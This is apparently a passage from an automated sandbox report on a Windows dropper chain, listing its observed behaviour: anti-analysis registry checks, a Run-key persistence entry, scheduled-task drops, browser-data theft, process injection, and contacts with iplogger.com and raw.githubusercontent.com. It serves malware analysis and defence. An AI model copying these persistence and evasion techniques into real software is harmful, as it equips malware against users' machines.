Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine C:\Users\Admin\1000004002\689e56283d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\7a60b7df08.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\7a60b7df08.exe" C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explortu.job C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\1000004002\689e56283d.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\1000004002\689e56283d.exe N/A
N/A N/A C:\Users\Admin\1000004002\689e56283d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2068 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 2068 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 2068 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4048 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4048 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4048 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4048 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\689e56283d.exe
PID 4048 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\689e56283d.exe
PID 4048 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\689e56283d.exe
PID 3588 wrote to memory of 944 N/A C:\Users\Admin\1000004002\689e56283d.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 3588 wrote to memory of 944 N/A C:\Users\Admin\1000004002\689e56283d.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 3588 wrote to memory of 944 N/A C:\Users\Admin\1000004002\689e56283d.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 4048 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe
PID 4048 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe
PID 4048 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe
PID 944 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe
PID 944 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe
PID 4948 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe
PID 4948 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe
PID 4204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 4608 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4952 wrote to memory of 4608 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2580 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2580 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4204 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 2020 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2020 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4204 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2336 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4204 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 584 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 584 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 580 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 580 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3536 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 584 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 584 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2360 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2360 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4204 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4948_133616318950219178\stub.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1556 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 716 wrote to memory of 3516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 716 wrote to memory of 3516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 944 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe

"C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\1000004002\689e56283d.exe

"C:\Users\Admin\1000004002\689e56283d.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe"

C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe

"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"

